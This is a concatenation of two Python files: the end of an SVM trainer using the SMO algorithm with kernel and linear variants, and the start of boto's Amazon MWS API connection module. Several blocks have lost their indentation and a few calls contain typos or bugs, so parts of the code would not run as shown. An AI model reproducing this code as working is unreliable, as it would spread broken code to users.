        return maxK, Ej
    else:   #in this case (first time around) we don't have any valid eCache values
        j = selectJrand(i, oS.m)
        Ej = calcEk(oS, j)
    return j, Ej
def updateEk(oS, k):
    """Recompute E_k and mark it valid in the error cache."""
    oS.eCache[k] = [1, calcEk(oS, k)]
def innerL(i, oS):
    """Attempt one SMO optimization step for sample i (kernel version).

    Returns 1 if a pair of alphas was changed, 0 otherwise.
    """
    Ei = calcEk(oS, i)
    # Proceed only if sample i violates the KKT conditions within tolerance.
    if ((oS.labelMat[i]*Ei < -oS.tol) and (oS.alphas[i] < oS.C)) or ((oS.labelMat[i]*Ei > oS.tol) and (oS.alphas[i] > 0)):
        j,Ej = selectJ(i, oS, Ei) #this has been changed from selectJrand
        alphaIold = oS.alphas[i].copy(); alphaJold = oS.alphas[j].copy();
        # L,H bound alpha_j so both alphas stay in [0,C] on the constraint line.
        if (oS.labelMat[i] != oS.labelMat[j]):
            L = max(0, oS.alphas[j] - oS.alphas[i])
            H = min(oS.C, oS.C + oS.alphas[j] - oS.alphas[i])
        else:
            L = max(0, oS.alphas[j] + oS.alphas[i] - oS.C)
            H = min(oS.C, oS.alphas[j] + oS.alphas[i])
        if L==H: print("L==H"); return 0
        eta = 2.0 * oS.K[i,j] - oS.K[i,i] - oS.K[j,j] #changed for kernel
        if eta >= 0: print("eta>=0"); return 0
        oS.alphas[j] -= oS.labelMat[j]*(Ei - Ej)/eta
        oS.alphas[j] = clipAlpha(oS.alphas[j],H,L)
        updateEk(oS, j) #added this for the Ecache
        if (abs(oS.alphas[j] - alphaJold) < 0.00001): print("j not moving enough"); return 0
        oS.alphas[i] += oS.labelMat[j]*oS.labelMat[i]*(alphaJold - oS.alphas[j])#update i by the same amount as j
        updateEk(oS, i) #added this for the Ecache    #the update is in the opposite direction
        b1 = oS.b - Ei- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.K[i,i] - oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.K[i,j]
        b2 = oS.b - Ej- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.K[i,j]- oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.K[j,j]
        # Keep b consistent with whichever alpha remains unbound.
        if (0 < oS.alphas[i]) and (oS.C > oS.alphas[i]): oS.b = b1
        elif (0 < oS.alphas[j]) and (oS.C > oS.alphas[j]): oS.b = b2
        else: oS.b = (b1 + b2)/2.0
        return 1
    else: return 0
def smoP(dataMatIn, classLabels, C, toler, maxIter,kTup=('lin', 0)): #full Platt SMO
    """Full Platt SMO driver (kernel version); returns (b, alphas).

    Alternates between full passes over all samples and passes over the
    non-bound alphas only, until maxIter passes or no alpha changes.
    """
    oS = optStruct(mat(dataMatIn),mat(classLabels).transpose(),C,toler, kTup)
    iter = 0
    entireSet = True; alphaPairsChanged = 0
    while (iter < maxIter) and ((alphaPairsChanged > 0) or (entireSet)):
        alphaPairsChanged = 0
        if entireSet:   #go over all
            for i in range(oS.m):
                alphaPairsChanged += innerL(i,oS)
                print("fullSet, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
            iter += 1
        else:#go over non-bound (railed) alphas
            nonBoundIs = nonzero((oS.alphas.A > 0) * (oS.alphas.A < C))[0]
            for i in nonBoundIs:
                alphaPairsChanged += innerL(i,oS)
                print("non-bound, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
            iter += 1
        if entireSet: entireSet = False #toggle entire set loop
        elif (alphaPairsChanged == 0): entireSet = True
        print("iteration number: %d" % iter)
    return oS.b,oS.alphas
def calcWs(alphas,dataArr,classLabels):
    """Recover the weight vector w = sum_i alpha_i * y_i * x_i (n x 1 matrix)."""
    X = mat(dataArr)
    y = mat(classLabels).transpose()
    m, n = shape(X)
    w = zeros((n, 1))
    for idx in range(m):
        w += multiply(alphas[idx] * y[idx], X[idx, :].T)
    return w
def testRbf(k1=1.3):
    """Train an RBF-kernel SVM on testSetRBF.txt and report train/test error.

    k1 is the RBF sigma. Loads data files from the working directory.
    """
    dataArr,labelArr = loadDataSet('testSetRBF.txt')
    b,alphas = smoP(dataArr, labelArr, 200, 0.0001, 10000, ('rbf', k1)) #C=200 important
    datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
    svInd=nonzero(alphas.A>0)[0]
    sVs=datMat[svInd] #get matrix of only support vectors
    labelSV = labelMat[svInd];
    print("there are %d Support Vectors" % shape(sVs)[0])
    m,n = shape(datMat)
    errorCount = 0
    for i in range(m):
        # classification only needs the support vectors
        kernelEval = kernelTrans(sVs,datMat[i,:],('rbf', k1))
        predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
        if sign(predict)!=sign(labelArr[i]): errorCount += 1
    print("the training error rate is: %f" % (float(errorCount)/m))
    dataArr,labelArr = loadDataSet('testSetRBF2.txt')
    errorCount = 0
    datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
    m,n = shape(datMat)
    for i in range(m):
        kernelEval = kernelTrans(sVs,datMat[i,:],('rbf', k1))
        predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
        if sign(predict)!=sign(labelArr[i]): errorCount += 1
    print("the test error rate is: %f" % (float(errorCount)/m))
def img2vector(filename):
    """Flatten a 32x32 text image of digit characters into a 1x1024 row vector."""
    vect = zeros((1, 1024))
    handle = open(filename)
    for row in range(32):
        line = handle.readline()
        for col in range(32):
            vect[0, 32 * row + col] = int(line[col])
    return vect
def loadImages(dirName):
    """Load all digit files under dirName into (trainingMat, hwLabels).

    File names look like '<digit>_<n>.txt'; digit 9 is labeled -1 and
    every other digit +1 (binary 9-vs-rest task).
    """
    from os import listdir
    hwLabels = []
    trainingFileList = listdir(dirName)           #load the training set
    m = len(trainingFileList)
    trainingMat = zeros((m,1024))
    for i in range(m):
        fileNameStr = trainingFileList[i]
        fileStr = fileNameStr.split('.')[0]     #take off .txt
        classNumStr = int(fileStr.split("_")[0])
        if classNumStr == 9: hwLabels.append(-1)
        else: hwLabels.append(1)
        trainingMat[i,:] = img2vector('%s/%s' % (dirName, fileNameStr))
    return trainingMat, hwLabels
def testDigits(kTup=('rbf', 10)):
    """Train a kernel SVM on the handwriting data and report train/test error.

    Expects 'trainingDigits' and 'testDigits' directories in the working
    directory (see loadImages for the file layout).
    """
    dataArr,labelArr = loadImages('trainingDigits')
    b,alphas = smoP(dataArr, labelArr, 200, 0.0001, 10000, kTup)
    datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
    svInd=nonzero(alphas.A>0)[0]
    sVs=datMat[svInd]
    labelSV = labelMat[svInd];
    print("there are %d Support Vectors" % shape(sVs)[0])
    m,n = shape(datMat)
    errorCount = 0
    for i in range(m):
        # classification only needs the support vectors
        kernelEval = kernelTrans(sVs,datMat[i,:],kTup)
        predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
        if sign(predict)!=sign(labelArr[i]): errorCount += 1
    print("the training error rate is: %f" % (float(errorCount)/m))
    dataArr,labelArr = loadImages('testDigits')
    errorCount = 0
    datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
    m,n = shape(datMat)
    for i in range(m):
        kernelEval = kernelTrans(sVs,datMat[i,:],kTup)
        predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
        if sign(predict)!=sign(labelArr[i]): errorCount += 1
    print("the test error rate is: %f" % (float(errorCount)/m))
#######********************************
#Non-Kernel Versions below
#######********************************
class optStructK:
    """Working state for the SMO optimizer (non-kernel / linear variant)."""
    def __init__(self,dataMatIn, classLabels, C, toler):
        """Store the training data and initialize alphas, b and the error cache."""
        self.X = dataMatIn
        self.labelMat = classLabels
        self.C = C
        self.tol = toler
        self.m = shape(dataMatIn)[0]          # number of training samples
        self.alphas = mat(zeros((self.m, 1)))
        self.b = 0
        # eCache rows hold [valid-flag, cached error Ek]
        self.eCache = mat(zeros((self.m, 2)))
def calcEkK(oS, k):
    """Prediction error E_k = f(x_k) - y_k for sample k (linear, no kernel)."""
    fx = float(multiply(oS.alphas, oS.labelMat).T * (oS.X * oS.X[k, :].T)) + oS.b
    return fx - float(oS.labelMat[k])
def selectJK(i, oS, Ei): #this is the second choice -heurstic, and calcs Ej
    """Choose the second alpha index j (non-kernel variant); return (j, Ej).

    Uses the max-|Ei - Ek| heuristic over cached errors, falling back to
    a random index on the first pass when the cache is still empty.
    """
    maxK = -1; maxDeltaE = 0; Ej = 0
    oS.eCache[i] = [1,Ei]  #set valid #choose the alpha that gives the maximum delta E
    validEcacheList = nonzero(oS.eCache[:,0].A)[0]
    if (len(validEcacheList)) > 1:
        for k in validEcacheList:   #loop through valid Ecache values and find the one that maximizes delta E
            if k == i: continue #don't calc for i, waste of time
            # BUGFIX: use the non-kernel error helper; calcEk reads oS.K,
            # which optStructK instances do not define (AttributeError).
            Ek = calcEkK(oS, k)
            deltaE = abs(Ei - Ek)
            if (deltaE > maxDeltaE):
                maxK = k; maxDeltaE = deltaE; Ej = Ek
        return maxK, Ej
    else:   #in this case (first time around) we don't have any valid eCache values
        j = selectJrand(i, oS.m)
        Ej = calcEkK(oS, j)  # BUGFIX: was calcEk
    return j, Ej
def updateEkK(oS, k):#after any alpha has changed update the new value in the cache
    """Recompute E_k and mark it valid in the error cache (non-kernel variant)."""
    # BUGFIX: call calcEkK, not the kernel version calcEk (optStructK has no .K).
    Ek = calcEkK(oS, k)
    oS.eCache[k] = [1,Ek]
def innerLK(i, oS):
    """Attempt one SMO optimization step for sample i (non-kernel variant).

    Returns 1 if a pair of alphas was changed, 0 otherwise.
    """
    # BUGFIX: this non-kernel variant must use calcEkK/selectJK/updateEkK;
    # the kernel-based helpers read oS.K, which optStructK does not define.
    Ei = calcEkK(oS, i)
    if ((oS.labelMat[i]*Ei < -oS.tol) and (oS.alphas[i] < oS.C)) or ((oS.labelMat[i]*Ei > oS.tol) and (oS.alphas[i] > 0)):
        j,Ej = selectJK(i, oS, Ei) #second-choice heuristic (was selectJ)
        alphaIold = oS.alphas[i].copy(); alphaJold = oS.alphas[j].copy();
        # L,H bound alpha_j so both alphas stay in [0,C] on the constraint line.
        if (oS.labelMat[i] != oS.labelMat[j]):
            L = max(0, oS.alphas[j] - oS.alphas[i])
            H = min(oS.C, oS.C + oS.alphas[j] - oS.alphas[i])
        else:
            L = max(0, oS.alphas[j] + oS.alphas[i] - oS.C)
            H = min(oS.C, oS.alphas[j] + oS.alphas[i])
        if L==H: print("L==H"); return 0
        eta = 2.0 * oS.X[i,:]*oS.X[j,:].T - oS.X[i,:]*oS.X[i,:].T - oS.X[j,:]*oS.X[j,:].T
        if eta >= 0: print("eta>=0"); return 0
        oS.alphas[j] -= oS.labelMat[j]*(Ei - Ej)/eta
        oS.alphas[j] = clipAlpha(oS.alphas[j],H,L)
        updateEkK(oS, j) #refresh the error cache for j (was updateEk)
        if (abs(oS.alphas[j] - alphaJold) < 0.00001): print("j not moving enough"); return 0
        oS.alphas[i] += oS.labelMat[j]*oS.labelMat[i]*(alphaJold - oS.alphas[j])#update i by the same amount as j
        updateEkK(oS, i) #refresh the error cache for i; update is in the opposite direction
        b1 = oS.b - Ei- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.X[i,:]*oS.X[i,:].T - oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.X[i,:]*oS.X[j,:].T
        b2 = oS.b - Ej- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.X[i,:]*oS.X[j,:].T - oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.X[j,:]*oS.X[j,:].T
        if (0 < oS.alphas[i]) and (oS.C > oS.alphas[i]): oS.b = b1
        elif (0 < oS.alphas[j]) and (oS.C > oS.alphas[j]): oS.b = b2
        else: oS.b = (b1 + b2)/2.0
        return 1
    else: return 0
def smoPK(dataMatIn, classLabels, C, toler, maxIter): #full Platt SMO
    """Full Platt SMO driver (non-kernel variant); returns (b, alphas).

    Alternates between full passes and passes over non-bound alphas,
    until maxIter passes or no alpha changes.
    """
    # BUGFIX: build the non-kernel state object. optStruct requires a fifth
    # kTup argument (calling it here raised TypeError) and precomputes a
    # kernel matrix this variant never uses.
    oS = optStructK(mat(dataMatIn),mat(classLabels).transpose(),C,toler)
    iter = 0
    entireSet = True; alphaPairsChanged = 0
    while (iter < maxIter) and ((alphaPairsChanged > 0) or (entireSet)):
        alphaPairsChanged = 0
        if entireSet:   #go over all
            for i in range(oS.m):
                # BUGFIX: use the non-kernel inner loop innerLK (innerL
                # reads oS.K, which optStructK does not define).
                alphaPairsChanged += innerLK(i,oS)
                print("fullSet, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
            iter += 1
        else:#go over non-bound (railed) alphas
            nonBoundIs = nonzero((oS.alphas.A > 0) * (oS.alphas.A < C))[0]
            for i in nonBoundIs:
                alphaPairsChanged += innerLK(i,oS)  # BUGFIX: was innerL
                print("non-bound, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
            iter += 1
        if entireSet: entireSet = False #toggle entire set loop
        elif (alphaPairsChanged == 0): entireSet = True
        print("iteration number: %d" % iter)
return oS.b,oS.alphas | huaj1101/ML-PY | ML_IN_ACTION/C6/svmMLiA.py | Python | apache-2.0 | 15,888 |
# Copyright (c) 2012-2014 Andy Davidoff http://www.disruptek.com/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import hashlib
import string
import collections
from boto.connection import AWSQueryConnection
from boto.exception import BotoServerError
import boto.mws.exception
import boto.mws.response
from boto.handler import XmlHandler
from boto.compat import filter, map, six, encodebytes
__all__ = ['MWSConnection']
# Maps each MWS API section name to (API version, access-key parameter
# name, request path) used by api_action() when building requests.
api_version_path = {
    'Feeds':     ('2009-01-01', 'Merchant', '/'),
    'Reports':   ('2009-01-01', 'Merchant', '/'),
    'Orders':    ('2013-09-01', 'SellerId', '/Orders/2013-09-01'),
    'Products':  ('2011-10-01', 'SellerId', '/Products/2011-10-01'),
    'Sellers':   ('2011-07-01', 'SellerId', '/Sellers/2011-07-01'),
    'Inbound':   ('2010-10-01', 'SellerId',
                  '/FulfillmentInboundShipment/2010-10-01'),
    'Outbound':  ('2010-10-01', 'SellerId',
                  '/FulfillmentOutboundShipment/2010-10-01'),
    'Inventory': ('2010-10-01', 'SellerId',
                  '/FulfillmentInventory/2010-10-01'),
    'Recommendations': ('2013-04-01', 'SellerId',
                        '/Recommendations/2013-04-01'),
    'CustomerInfo': ('2014-03-01', 'SellerId',
                     '/CustomerInformation/2014-03-01'),
    'CartInfo': ('2014-03-01', 'SellerId',
                 '/CartInformation/2014-03-01'),
    'Subscriptions': ('2013-07-01', 'SellerId',
                      '/Subscriptions/2013-07-01'),
    'OffAmazonPayments': ('2013-01-01', 'SellerId',
                          '/OffAmazonPayments/2013-01-01'),
}
# Base64-encoded MD5 digest of a request body (for Content-MD5 headers).
content_md5 = lambda c: encodebytes(hashlib.md5(c).digest()).strip()
# Attributes copied onto decorator wrappers by add_attrs_from().
decorated_attrs = ('action', 'response', 'section',
                   'quota', 'restore', 'version')
# Filled by api_action(): MWS Action name (e.g. 'SubmitFeed') -> method name.
api_call_map = {}
def add_attrs_from(func, to):
    """Copy the MWS decoration attributes from func onto wrapper 'to'.

    Attributes missing on func are set to None. Records the wrapped
    callable on to.__wrapped__ and returns the wrapper, so decorator
    layers can be stacked without losing metadata.
    """
    for name in decorated_attrs:
        setattr(to, name, getattr(func, name, None))
    to.__wrapped__ = func
    return to
def structured_lists(*fields):
    """Decorator factory: expand list-valued kwargs into numbered params.

    Each field is given as 'Key.Accessor'; a kwarg 'Key' whose value is a
    list becomes 'Key.Accessor.1', 'Key.Accessor.2', ... as MWS expects.
    """
    def decorator(func):
        def wrapper(self, *args, **kw):
            for key, acc in [f.split('.') for f in fields]:
                if key in kw:
                    newkey = key + '.' + acc + (acc and '.' or '')
                    for i in range(len(kw[key])):
                        kw[newkey + str(i + 1)] = kw[key][i]
                    kw.pop(key)
            return func(self, *args, **kw)
        wrapper.__doc__ = "{0}\nLists: {1}".format(func.__doc__,
                                                   ', '.join(fields))
        return add_attrs_from(func, to=wrapper)
    return decorator
def http_body(field):
    """Decorator factory: move kwarg 'field' into the HTTP request body.

    Requires both 'field' and 'content_type' kwargs; sets Content-Type
    and Content-MD5 headers from them.
    """
    def decorator(func):
        def wrapper(*args, **kw):
            if any([f not in kw for f in (field, 'content_type')]):
                message = "{0} requires {1} and content_type arguments for " \
                          "building HTTP body".format(func.action, field)
                raise KeyError(message)
            kw['body'] = kw.pop(field)
            kw['headers'] = {
                'Content-Type': kw.pop('content_type'),
                'Content-MD5': content_md5(kw['body']),
            }
            return func(*args, **kw)
        wrapper.__doc__ = "{0}\nRequired HTTP Body: " \
                          "{1}".format(func.__doc__, field)
        return add_attrs_from(func, to=wrapper)
    return decorator
def destructure_object(value, into, prefix, members=False):
    """Recursively flatten 'value' into the flat request-parameter dict 'into'.

    ResponseElement instances and mappings recurse per attribute/key
    (skipping '_'-prefixed names), iterables are numbered ('.1', '.2', ...
    or '.member.N' when members is True), booleans are lowercased, and
    other scalars are stored directly under 'prefix'.
    """
    # BUGFIX/compat: the Mapping/Iterable ABCs moved to collections.abc in
    # Python 3.3 and were removed from the collections top level in 3.10;
    # fall back to the old location on Python 2.
    _abc = getattr(collections, 'abc', collections)
    if isinstance(value, boto.mws.response.ResponseElement):
        destructure_object(value.__dict__, into, prefix, members=members)
    elif isinstance(value, _abc.Mapping):
        for name in value:
            if name.startswith('_'):
                continue
            destructure_object(value[name], into, prefix + '.' + name,
                               members=members)
    elif isinstance(value, six.string_types):
        into[prefix] = value
    elif isinstance(value, _abc.Iterable):
        for index, element in enumerate(value):
            suffix = (members and '.member.' or '.') + str(index + 1)
            destructure_object(element, into, prefix + suffix,
                               members=members)
    elif isinstance(value, bool):
        into[prefix] = str(value).lower()
    else:
        into[prefix] = value
def structured_objects(*fields, **kwargs):
    """Decorator factory: flatten rich objects in 'fields' into request params.

    Delegates to destructure_object(); pass members=True to number
    iterables with the '.member.N' convention.
    """
    def decorator(func):
        def wrapper(*args, **kw):
            members = kwargs.get('members', False)
            for field in filter(lambda i: i in kw, fields):
                destructure_object(kw.pop(field), kw, field, members=members)
            return func(*args, **kw)
        wrapper.__doc__ = "{0}\nElement|Iter|Map: {1}\n" \
                          "(ResponseElement or anything iterable/dict-like)" \
                          .format(func.__doc__, ', '.join(fields))
        return add_attrs_from(func, to=wrapper)
    return decorator
def requires(*groups):
    """Decorator factory: exactly one of the argument groups must be supplied.

    Each group is a sequence of kwarg names; raises KeyError unless the
    call provides all names of exactly one group.
    """
    def decorator(func):
        def wrapper(*args, **kw):
            present = lambda group: all(key in kw for key in group)
            if 1 != len(list(filter(present, groups))):
                described = ' OR '.join(['+'.join(g) for g in groups])
                raise KeyError("{0} requires {1} argument(s)"
                               "".format(func.action, described))
            return func(*args, **kw)
        described = ' OR '.join(['+'.join(g) for g in groups])
        wrapper.__doc__ = "{0}\nRequired: {1}".format(func.__doc__,
                                                      described)
        return add_attrs_from(func, to=wrapper)
    return decorator
def exclusive(*groups):
    """Decorator factory: at most one of the argument groups may be supplied.

    Raises KeyError when more than one group is fully present.
    """
    def decorator(func):
        def wrapper(*args, **kw):
            hasgroup = lambda group: all(key in kw for key in group)
            if len(list(filter(hasgroup, groups))) not in (0, 1):
                message = ' OR '.join(['+'.join(g) for g in groups])
                message = "{0} requires either {1}" \
                          "".format(func.action, message)
                raise KeyError(message)
            return func(*args, **kw)
        message = ' OR '.join(['+'.join(g) for g in groups])
        wrapper.__doc__ = "{0}\nEither: {1}".format(func.__doc__,
                                                    message)
        return add_attrs_from(func, to=wrapper)
    return decorator
def dependent(field, *groups):
    """Decorator factory: if kwarg 'field' is passed, one of the argument
    groups must also be fully supplied; raises KeyError otherwise."""
    def decorator(func):
        def wrapper(*args, **kw):
            hasgroup = lambda group: all(key in kw for key in group)
            if field in kw and not any(hasgroup(g) for g in groups):
                message = ' OR '.join(['+'.join(g) for g in groups])
                message = "{0} argument {1} requires {2}" \
                          "".format(func.action, field, message)
                raise KeyError(message)
            return func(*args, **kw)
        message = ' OR '.join(['+'.join(g) for g in groups])
        wrapper.__doc__ = "{0}\n{1} requires: {2}".format(func.__doc__,
                                                          field,
                                                          message)
        return add_attrs_from(func, to=wrapper)
    return decorator
def requires_some_of(*fields):
    """Decorator factory: at least one of 'fields' must be passed as a kwarg."""
    def decorator(func):
        def wrapper(*args, **kw):
            if not any(name in kw for name in fields):
                raise KeyError("{0} requires at least one of {1} argument(s)"
                               "".format(func.action, ', '.join(fields)))
            return func(*args, **kw)
        wrapper.__doc__ = "{0}\nSome Required: {1}".format(func.__doc__,
                                                           ', '.join(fields))
        return add_attrs_from(func, to=wrapper)
    return decorator
def boolean_arguments(*fields):
    """Decorator factory: convert bool-valued kwargs named in 'fields' to
    the lowercase strings 'true'/'false' that MWS expects."""
    def decorator(func):
        def wrapper(*args, **kw):
            for name in fields:
                if isinstance(kw.get(name), bool):
                    kw[name] = str(kw[name]).lower()
            return func(*args, **kw)
        wrapper.__doc__ = "{0}\nBooleans: {1}".format(func.__doc__,
                                                      ', '.join(fields))
        return add_attrs_from(func, to=wrapper)
    return decorator
def api_action(section, quota, restore, *api):
    """Innermost decorator for MWS API call methods.

    Looks up the version/path/access-key triple for 'section', derives the
    MWS Action name from the function name (or an explicit *api override),
    registers it in api_call_map, and invokes the wrapped function with a
    prepared request dict and response object.
    """
    def decorator(func, quota=int(quota), restore=float(restore)):
        version, accesskey, path = api_version_path[section]
        action = ''.join(api or map(str.capitalize, func.__name__.split('_')))
        def wrapper(self, *args, **kw):
            # Default the access key (Merchant/SellerId) from the connection.
            kw.setdefault(accesskey, getattr(self, accesskey, None))
            if kw[accesskey] is None:
                message = "{0} requires {1} argument. Set the " \
                          "MWSConnection.{2} attribute?" \
                          "".format(action, accesskey, accesskey)
                raise KeyError(message)
            kw['Action'] = action
            kw['Version'] = version
            response = self._response_factory(action, connection=self)
            request = dict(path=path, quota=quota, restore=restore)
            return func(self, request, response, *args, **kw)
        # NOTE: relies on locals() to pick up action/section/quota/... by
        # name; do not rename these local variables.
        for attr in decorated_attrs:
            setattr(wrapper, attr, locals().get(attr))
        wrapper.__doc__ = "MWS {0}/{1} API call; quota={2} restore={3:.2f}\n" \
                          "{4}".format(action, version, quota, restore,
                                       func.__doc__)
        api_call_map[action] = func.__name__
        return wrapper
    return decorator
class MWSConnection(AWSQueryConnection):
ResponseFactory = boto.mws.response.ResponseFactory
ResponseErrorFactory = boto.mws.exception.ResponseErrorFactory
    def __init__(self, *args, **kw):
        """Create an MWS connection.

        Accepts Merchant/SellerId (interchangeable), sandbox and
        factory_scopes keyword arguments on top of AWSQueryConnection's.
        """
        kw.setdefault('host', 'mws.amazonservices.com')
        self._sandboxed = kw.pop('sandbox', False)
        # Merchant and SellerId are aliases for the same credential; keep
        # both attributes populated from whichever was supplied.
        self.Merchant = kw.pop('Merchant', None) or kw.get('SellerId')
        self.SellerId = kw.pop('SellerId', None) or self.Merchant
        kw = self._setup_factories(kw.pop('factory_scopes', []), **kw)
        super(MWSConnection, self).__init__(*args, **kw)
    def _setup_factories(self, extrascopes, **kw):
        """Install the response and error factories on the connection.

        Caller-supplied 'response_factory'/'response_error_factory' kwargs
        override the defaults; otherwise the default factory classes are
        instantiated with extrascopes plus the standard boto.mws scope.
        Returns kw with the factory-related keys consumed.
        """
        for factory, (scope, Default) in {
            'response_factory':
            (boto.mws.response, self.ResponseFactory),
            'response_error_factory':
            (boto.mws.exception, self.ResponseErrorFactory),
        }.items():
            if factory in kw:
                setattr(self, '_' + factory, kw.pop(factory))
            else:
                scopes = extrascopes + [scope]
                setattr(self, '_' + factory, Default(scopes=scopes))
        return kw
def _sandboxify(self, path):
if not self._sandboxed:
return path
splat = path.split('/')
splat[-2] += '_Sandbox'
return splat.join('/')
    def _required_auth_capability(self):
        """Request the 'mws' request-signing scheme from boto's auth layer."""
        return ['mws']
def _post_request(self, request, params, parser, body='', headers=None):
"""Make a POST request, optionally with a content body,
and return the response, optionally as raw text.
"""
headers = headers or {}
path = self._sandboxify(request['path'])
request = self.build_base_http_request('POST', path, None, data=body,
params=params, headers=headers,
host=self.host)
try:
response = self._mexe(request, override_num_retries=None)
except BotoServerError as bs:
raise self._response_error_factor(bs.status, bs.reason, bs.body)
body = response.read()
boto.log.debug(body)
if not body:
boto.log.error('Null body %s' % body)
raise self._response_error_factory(response.status,
response.reason, body)
if response.status != 200:
boto.log.error('%s %s' % (response.status, response.reason))
boto.log.error('%s' % body)
raise self._response_error_factory(response.status,
response.reason, body)
digest = response.getheader('Content-MD5')
if digest is not None:
assert content_md5(body) == digest
contenttype = response.getheader('Content-Type')
return self._parse_response(parser, contenttype, body)
    def _parse_response(self, parser, contenttype, body):
        """Feed an XML body through the SAX 'parser' object and return it;
        non-XML bodies are returned verbatim as raw text."""
        if not contenttype.startswith('text/xml'):
            return body
        handler = XmlHandler(parser, self)
        xml.sax.parseString(body, handler)
        return parser
def method_for(self, name):
"""Return the MWS API method referred to in the argument.
The named method can be in CamelCase or underlined_lower_case.
This is the complement to MWSConnection.any_call.action
"""
action = '_' in name and string.capwords(name, '_') or name
if action in api_call_map:
return getattr(self, api_call_map[action])
return None
def iter_call(self, call, *args, **kw):
"""Pass a call name as the first argument and a generator
is returned for the initial response and any continuation
call responses made using the NextToken.
"""
method = self.method_for(call)
assert method, 'No call named "{0}"'.format(call)
return self.iter_response(method(*args, **kw))
def iter_response(self, response):
"""Pass a call's response as the initial argument and a
generator is returned for the initial response and any
continuation call responses made using the NextToken.
"""
yield response
more = self.method_for(response._action + 'ByNextToken')
while more and response._result.HasNext == 'true':
response = more(NextToken=response._result.NextToken)
yield response
    # Decorator stack shared by all API wrappers in this class:
    # @requires enforces mandatory keyword arguments, @boolean_arguments
    # and @structured_lists normalize parameter encodings, @http_body
    # routes a kwarg into the POST body, and @api_action binds the call
    # to an API section.  NOTE(review): the two numeric @api_action
    # arguments look like throttling quota / restore-rate values --
    # confirm against the api_action decorator's definition.
    @requires(['FeedType'])
    @boolean_arguments('PurgeAndReplace')
    @http_body('FeedContent')
    @structured_lists('MarketplaceIdList.Id')
    @api_action('Feeds', 15, 120)
    def submit_feed(self, request, response, headers=None, body='', **kw):
        """Uploads a feed for processing by Amazon MWS.

        The feed content is sent as the raw POST body; callers may
        supply extra HTTP headers via *headers*.
        """
        headers = headers or {}
        return self._post_request(request, kw, response, body=body,
                                  headers=headers)
@structured_lists('FeedSubmissionIdList.Id', 'FeedTypeList.Type',
'FeedProcessingStatusList.Status')
@api_action('Feeds', 10, 45)
def get_feed_submission_list(self, request, response, **kw):
"""Returns a list of all feed submissions submitted in the
previous 90 days.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Feeds', 0, 0)
def get_feed_submission_list_by_next_token(self, request, response, **kw):
"""Returns a list of feed submissions using the NextToken parameter.
"""
return self._post_request(request, kw, response)
@structured_lists('FeedTypeList.Type', 'FeedProcessingStatusList.Status')
@api_action('Feeds', 10, 45)
def get_feed_submission_count(self, request, response, **kw):
"""Returns a count of the feeds submitted in the previous 90 days.
"""
return self._post_request(request, kw, response)
@structured_lists('FeedSubmissionIdList.Id', 'FeedTypeList.Type')
@api_action('Feeds', 10, 45)
def cancel_feed_submissions(self, request, response, **kw):
"""Cancels one or more feed submissions and returns a
count of the feed submissions that were canceled.
"""
return self._post_request(request, kw, response)
@requires(['FeedSubmissionId'])
@api_action('Feeds', 15, 60)
def get_feed_submission_result(self, request, response, **kw):
"""Returns the feed processing report.
"""
return self._post_request(request, kw, response)
def get_service_status(self, **kw):
"""Instruct the user on how to get service status.
"""
sections = ', '.join(map(str.lower, api_version_path.keys()))
message = "Use {0}.get_(section)_service_status(), " \
"where (section) is one of the following: " \
"{1}".format(self.__class__.__name__, sections)
raise AttributeError(message)
@requires(['ReportType'])
@structured_lists('MarketplaceIdList.Id')
@boolean_arguments('ReportOptions=ShowSalesChannel')
@api_action('Reports', 15, 60)
def request_report(self, request, response, **kw):
"""Creates a report request and submits the request to Amazon MWS.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportRequestIdList.Id', 'ReportTypeList.Type',
'ReportProcessingStatusList.Status')
@api_action('Reports', 10, 45)
def get_report_request_list(self, request, response, **kw):
"""Returns a list of report requests that you can use to get the
ReportRequestId for a report.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Reports', 0, 0)
def get_report_request_list_by_next_token(self, request, response, **kw):
"""Returns a list of report requests using the NextToken,
which was supplied by a previous request to either
GetReportRequestListByNextToken or GetReportRequestList, where
the value of HasNext was true in that previous request.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportTypeList.Type',
'ReportProcessingStatusList.Status')
@api_action('Reports', 10, 45)
def get_report_request_count(self, request, response, **kw):
